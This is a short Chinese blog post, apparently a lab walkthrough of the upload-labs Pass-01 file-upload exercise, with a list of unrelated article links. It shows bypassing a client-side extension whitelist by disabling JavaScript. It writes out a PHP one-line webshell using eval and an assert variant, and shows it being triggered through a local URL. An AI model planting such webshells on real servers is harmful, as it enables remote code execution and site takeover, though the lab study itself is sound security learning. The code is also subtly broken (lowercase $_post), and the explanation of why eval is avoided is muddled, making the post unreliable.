文件上传漏洞

  • 开发
  • 40
Pass-01

查看代码:源码定义白名单 .jpg.png.gif

VS中编写一句话木马web.php

<?php eval($_post['oupeng']); ?> 这个一句话木马会被系统pass掉

在设置中更改网站不允许使用js

上传web.php

用http://127.0.0.1/upload/web.php?0=assert&1=phpinfo()

0=assert传递函数 执行一句话木马 <?php assert($_post[1]); ?>

之所以不使用eval是因为这个函数很敏感,会被大多数的网站会屏蔽掉

阅读全部

相关推荐

  5. 文件漏洞

    2024-03-22 07:54:05       37 阅读

  7. ·xss文件漏洞

    2024-03-22 07:54:05       39 阅读

最近更新

  3. docker php8.1+nginx base 镜像 dockerfile 配置

    2024-03-22 07:54:05       94 阅读

  4. Could not load dynamic library ‘cudart64_100.dll‘

    2024-03-22 07:54:05       100 阅读

  9. 在Django里面运行非项目文件

    2024-03-22 07:54:05       82 阅读

  19. Python语言-面向对象

    2024-03-22 07:54:05       91 阅读

  20. 如何分清楚常见的 Git 分支管理策略Git Flow、GitHub Flow 和 GitLab Flow

    2024-03-22 07:54:05       85 阅读

热门阅读

  7. Semi-supervised Open-World Object Detection

    2024-03-22 07:54:05       38 阅读

  10. npm 清空缓存重新打包的命令

    2024-03-22 07:54:05       38 阅读

  11. Vue reactive函数的使用

    2024-03-22 07:54:05       46 阅读

  12. 大数据开发(Spark面试真题)

    2024-03-22 07:54:05       36 阅读

  15. 数据库知识点

    2024-03-22 07:54:05       37 阅读

  16. Uniapp 的 uni.request传参后端

    2024-03-22 07:54:05       38 阅读

  18. IOS面试题编程机制 6-10

    2024-03-22 07:54:05       34 阅读

  26. 如何实现自己的Spring Boot Starter

    2024-03-22 07:54:05       41 阅读

  30. QT网络编程之实现UDP广播发送和接收

    2024-03-22 07:54:05       40 阅读